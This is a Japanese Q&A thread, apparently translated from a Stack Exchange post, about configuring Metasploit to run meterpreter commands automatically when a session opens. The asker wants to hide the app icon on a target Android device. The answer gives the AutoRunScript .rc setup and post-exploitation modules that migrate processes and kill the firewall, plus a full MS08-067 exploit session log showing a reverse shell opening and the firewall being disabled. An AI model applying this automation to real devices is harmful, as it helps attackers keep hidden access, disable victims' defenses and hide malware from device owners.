リスナーが接続を取得するとすぐに、1つまたは複数のmeterpreterコマンドを自動的に実行する方法はありますか(つまり、ターゲットとのセッションが確立されます)?セッションが取得されたらすぐに「hide_app_icon」コマンドを実行したいと思います。何か案は?
PS:ターゲットはAndroid=デバイスであり、リスナーはdebian VPSで実行されています。
そうだね!コマンドを使用してファイル(.rcファイル)を定義し、そのファイルを自動実行可能として設定できます。
msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
起動するコマンドを.rcファイル内に配置します。
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
次に、セッションが作成された後、それらは自動的に実行されます。
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.200.40:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400
meterpreter >
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*] Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*] Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
here から抽出。説明するのに十分なので、同じ例をコピーして貼り付けました。そして、リンクをチェックしてください、それはより興味深いものを持っています。